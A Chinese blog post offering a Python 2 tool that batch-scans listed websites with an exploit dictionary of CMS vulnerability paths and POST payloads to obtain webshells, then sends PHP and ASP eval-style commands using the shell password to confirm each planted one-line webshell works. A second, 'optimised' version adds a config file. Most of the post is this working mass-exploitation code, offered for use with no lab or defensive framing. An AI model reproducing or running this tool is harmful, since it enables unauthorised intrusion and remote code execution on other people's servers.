一鍵獲取webShell,同時驗證是不是可以連接一句話

原創 DAo_1990 2020-02-21 00:08

目標:根據上一篇寫的指紋錄入工具,可以收集很多cms等漏洞指紋,然後運行改腳本直接獲取shell,也可以作爲路徑掃描程序,同時含有一句話連接驗證功能

#coding=utf-8

import requests

import Queue
import threading
import  re

queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 測試路徑
#exp_info(3) POST 提交的數據 GET 爲空
#exp_info(4) 關鍵字
#exp_info(5) shell的路徑
#exp_info(5) shell的密碼
#====================================================#
def init():
    f=open("exp.dic")
    for line in  f.readlines():
        exp_info=line.strip().split('|')
        queue.put(exp_info)
    f.close()

def openUrl(url,GET_POST,pdata):
    try:
        if GET_POST=="POST":
            #分解post數據
            s = ",".join(pdata.split("&"))
            pdata = dict((l.split('=') for l in s.split(',')))
            r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
        else :
            r = requests.get(url, timeout=20, allow_redirects=False)
        content=r.content
        r.close()
        if r.status_code  in [200,500]:
            return (r.status_code ,r.encoding,content)
        return (0,0,False)
    except:
        return (0,0,False)

def checkKeyWord(page,page_encoding,keyword):
    try:
        page = unicode(page, page_encoding)
    except:
        return False
    pattern =re.compile(keyword)
    if pattern.findall(page)!=[]:
        return True
    else:
        return False
def checkConnectionSuccess(shell_url,pdata):
    status_code, encoding, content = openUrl(shell_url, "POST", pdata)
    #print status_code,content
    if content == "test":
        print " the connection is successful "
    else:
        print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
    script_type=shell_url.split(".")[-1]
    #print script_type
    if script_type=='php':
        pdata=shell_pwd+'=echo "test";'
        return checkConnectionSuccess(shell_url,pdata)
    elif script_type=='asp':
        pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
        return checkConnectionSuccess(shell_url,pdata)
    else:
        pdata=shell_pwd+'=Response.Clear();Response.Write("test");'
        return checkConnectionSuccess(shell_url,pdata)


def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
    if content is not False:
        if content is None:
            print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
        else:
            if re_keyword is None:
                if shell_url is None:
                    print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
                else:
                    print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
            else:
                if checkKeyWord(content, page_encoding, re_keyword) is True:
                    if shell_url is None:
                        print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
                    else:
                        print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
                        #檢測是不是可以連接一句話
                        checkGetShellSuccess(shell_url, shell_pwd)
                else:
                    print '[-]status[%s]---%s is possible' % (status_code, test_url)

def scan(url):
    while not queue.empty():
        exp_info=queue.get(True)
        GET_POST=exp_info[0]
        test_url=url+exp_info[1]
        pdata=exp_info[2]
        re_keyword=exp_info[3]
        shell_url=url+exp_info[4]
        shell_pwd=exp_info[5]
        #print "scanning "+url
        status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
        output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        queue.task_done()


if __name__=="__main__":
    threadNum = 50     #線程數量
    f=open("2.txt")    #2.txt添加你要測試的網站
    for url in f.readlines():
        init()
        url="http://"+url.strip()
        print "scanning "+url
        for i in range(threadNum):
            t = threading.Thread(target=scan,args={url,})
            t.start()
        queue.join()

    f.close()
    raw_input('press enter key to exit') #這兒放一個等待輸入是爲了不讓程序退出

利用pyinstaller 打包成exe,運行結果如下:
這裏寫圖片描述

最新加入了一句話驗證功能
這裏寫圖片描述

優化版本
a)添加配置文件
b)文件不存在捕獲提示
c)輸出提示更完善
getshell.py

#coding=utf-8

import requests

import Queue
import threading
import  re
import ConfigParser
queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 測試路徑
#exp_info(3) POST 提交的數據 GET 爲空
#exp_info(4) 關鍵字
#exp_info(5) shell的路徑
#exp_info(5) shell的密碼
#====================================================#
def init(filename):
    try:
        f=open(filename)
        for line in f.readlines():
            exp_info = line.strip().split('|')
            queue.put(exp_info)
        f.close()
    except:
        return  False


def openUrl(url,GET_POST,pdata):
    try:
        if GET_POST=="POST":
            #分解post數據
            s = ",".join(pdata.split("&"))
            pdata = dict((l.split('=') for l in s.split(',')))
            r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
        else :
            r = requests.get(url, timeout=20, allow_redirects=False)
        content=r.content
        r.close()
        if r.status_code  in [200,500]:
            return (r.status_code ,r.encoding,content)
        return (0,0,False)
    except:
        return (0,0,False)

def checkKeyWord(page,page_encoding,keyword):
    try:
        page = unicode(page, page_encoding)
    except:
        return False
    pattern =re.compile(keyword)
    if pattern.findall(page)!=[]:
        return True
    else:
        return False
def checkConnectionSuccess(shell_url,pdata):
    status_code, encoding, content = openUrl(shell_url, "POST", pdata)
    #print status_code,content
    if content == "test":
        print " the connection is successful "
    else:
        print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
    script_type=shell_url.split(".")[-1]
    #print script_type
    if script_type=='php':
        pdata=shell_pwd+'=echo "test";'
        checkConnectionSuccess(shell_url,pdata)
    else:
        pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
        checkConnectionSuccess(shell_url,pdata)


def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
    if content is not False:
        if content is None:
            print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
        else:
            if re_keyword is None:
                if shell_url ==url:
                    print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
                else:
                    print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
            else:
                if checkKeyWord(content, page_encoding, re_keyword) is True:
                    if shell_url ==url:
                        print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
                    else:
                        print test_url
                        print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
                        #檢測是不是可以連接一句話
                        checkGetShellSuccess(shell_url, shell_pwd)
                else:
                    print '[-]status[%s]---%s is possible' % (status_code, test_url)

def scan(url):
    while not queue.empty():
        exp_info=queue.get(True)
        GET_POST=exp_info[0]
        test_url=url+exp_info[1]
        pdata=exp_info[2]
        re_keyword=exp_info[3]
        shell_url=url+exp_info[4]
        shell_pwd=exp_info[5]
        #print "scanning "+url
        status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
        output(url,content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        queue.task_done()


def configRead():
    config = ConfigParser.ConfigParser()
    config.readfp(open('config.ini'))
    test_url_file_path = config.get("file_path", "test_url_file_path")
    exp_file_path = config.get("file_path", "exp_file_path")
    return test_url_file_path,exp_file_path

if __name__=="__main__":
    test_url_file_path, exp_file_path = configRead()
    threadNum = 50
    try:
        f=open(test_url_file_path)
        for url in f.readlines():
            if(init(exp_file_path) is False):
                print "exp file not found"
                break
            url="http://"+url.strip()
            print "scanning "+url
            for i in range(threadNum):
                t = threading.Thread(target=scan,args={url,})
                t.start()
            queue.join()
        f.close()
    except:
        print "test web url file not found"
    raw_input('press enter key to exit') #這兒放一個等待輸入是爲了不讓程序退出

配置文件
config.ini

[file_path]
;網站測試文件路徑
test_url_file_path=2.txt
;exp文件路徑
exp_file_path=exp.dic

這裏寫圖片描述

DAo_1990
發佈了87 篇原創文章 · 獲贊 26 · 訪問量 18萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

網絡爬蟲的祕密:如何高效地抓取JD.com視頻鏈接

在這個數據驅動的時代,信息就是力量。而在這片信息的海洋中,爬蟲技術就像是一艘靈活的潛水艇,讓我們能夠深入海底,探尋那些隱藏的寶藏。今天,我將帶領大家一起踏上一場奇妙的探險之旅,我們將使用Python這把瑞士軍刀,搭配RoboBrowser

原創 2024-05-18 00:07:59

記一次有點抽象的滲透經歷

0x01 獲取webshell 在各種信息蒐集中,發現某個ip的端口掛着一個比較老的服務。 首先看到了員工工號和手機號的雙重驗證,也不知道賬號是什麼結構組成的,基本上放棄字典爆破這一條路。於是乎打開之前用燈塔的掃描結果,看看文件泄露是否

原創 2024-05-17 23:16:30

地理數據可視化的神奇組合:Python和Geopandas

本文分享自華爲雲社區《Python與Geopandas:地理數據可視化與分析指南》,作者:檸檬味擁抱。 地理數據可視化在許多領域都是至關重要的,無論是研究地理空間分佈、城市規劃、環境保護還是商業決策。Python語言以其強大的數據處理和可視

原創 2024-05-15 10:59:41

Scrapy爬蟲:利用代理服務器爬取熱門網站數據

在當今數字化時代,互聯網上充斥着大量寶貴的數據資源,而爬蟲技術作爲一種高效獲取網絡數據的方式,受到了廣泛的關注和應用。本文將介紹如何使用Scrapy爬蟲框架,結合代理服務器,實現對熱門網站數據的高效爬取,以抖音爲案例進行說明。 1. 簡

原創 2024-05-15 00:08:57

Python函數與模塊的精髓與高級特性

本文分享自華爲雲社區《Python函數與模塊的精髓與高級特性》,作者:檸檬味擁抱。 Python 是一種功能強大的編程語言,擁有豐富的函數和模塊,使得開發者能夠輕鬆地構建複雜的應用程序。本文將介紹 Python 中函數和模塊的基本使用方法,

原創 2024-05-14 11:00:07

利用pyinstaller打包Python程序爲一個可執行文件

有時,Python發佈的程序需要被打包爲一個文件夾、甚至一個文件發佈。 目前(2020)最佳的策略是使用pyinstaller。 pyinstaller不僅支持打包整個運行環境到一個可執行文件,而且還支持加密。 但唯一的問題是,必須依賴

osc_hwc3munb 2024-05-14 02:04:34

做開發我是認真的!要麼不做,要麼全力以赴 | 每日趣聞

戳一戳小程序查看更多! 往 期 趣 聞 ☞你拖後腿了嗎?11 月份程序員工資出爐~ | 每日趣聞 ☞計算機專業會修電腦實錘!| 每日趣聞 ☞IT 行業這麼廣,你的職業規劃是什麼?| 每日趣聞 ☞奔潰啦~希望 Python 可

osc_r0irdqn7 2024-05-14 01:47:34

anaconda和pycharm區別是什麼?Python學習!

  學習Python的人,肯定聽說過anaconda和pycharm,但是很多人傻傻分不清楚它們之間有什麼區別,今天小編帶大家好好了解一下。   Anaconda:   是一個Python發行版,包含了conda、Python等180多個

osc_r0irdqn7 2024-05-14 01:47:30

Python爬蟲進階必備 | MD5 hash 案例解析彙總(一)

上次鹹魚對關於 MD5 hash 的JS加密方法做了總結,這次把鹹魚遇到的 MD5 hash 的案例做了彙總,這個彙總系列會持續更新,攢到一定數量的網站就發一次。 關於 MD5 HASH 的處理可以參考下面這篇文章: Python爬蟲進

osc_hzf6peqc 2024-05-14 01:40:15

爲程序員和新手準備的 8 大 Python 工具

Python 是一種開源編程語言,用於 Web 編程、數據科學、人工智能和許多科學應用。學習 Python 使程序員能夠專注於解決問題,而不是專注於語法,其豐富的庫賦予它完成偉大任務所需的力量。 1) IDLE 安裝 Python 時

osc_7cws6vmd 2024-05-14 01:06:43

【編測編學】自動化測試面試必背(上)

1、你會封裝自動化測試框架嗎?這個問得最多,甚至有很多公司直接寫在招聘要求中。自動化框架主要的核心框架就是分層+PO模式:分別爲:基礎封裝層BasePage,PO頁面對象層,TestCase測試用例層。然後再加上日誌處理模塊,ini配置文

osc_pjx77r92 2024-05-14 00:41:23

樹莓派真是個讓人慾罷不能的“小妖精”

大晚上不睡覺、枸杞泡起來@我 一個月之前、自從入了樹莓派4b 8g板之後、就無法自拔,上班除了開發業務代碼和搭建內部UI組件庫之外,就是不亦樂乎的學習docker、mysql、mongodb、php、python、frp等,採購了阿里雲E

osc_51airx3z 2024-05-14 00:37:28

用python畫出全球疫情趨勢變化圖

前言 文的文字及圖片來源於網絡,僅供學習、交流使用,不具有任何商業用途,版權歸原作者所有,如有問題請及時聯繫我們以作處理。 作者:謙睿科技 PS:如有需要Python學習資料的小夥伴可以加點擊下方鏈接自行獲取http://t.cn/A6Z

osc_t1bxxmjp 2024-05-14 00:03:10

Linux中的tty和pts

一、幾個基本概念 tty(Teletypewriter) 來源於“電傳打印機”,Linux系統中則是終端設備的統稱,同時也代指操作系統中支持終端設備的tty子系統。   console(控制檯)

原創 2024-05-18 00:45:13

Netgear無線路由器漏洞復現(CVE-2019-20760)

漏洞概述 漏洞服務: uhttpd 漏洞類型: 遠程命令執行 影響範圍: 1.0.4.26之前的NETGEAR R9000設備會受到身份驗證繞過的影響 解決建議: 更新版本 漏洞復現 操作環境: ubuntu:22.04 qemu-ve

原創 2024-05-14 23:17:30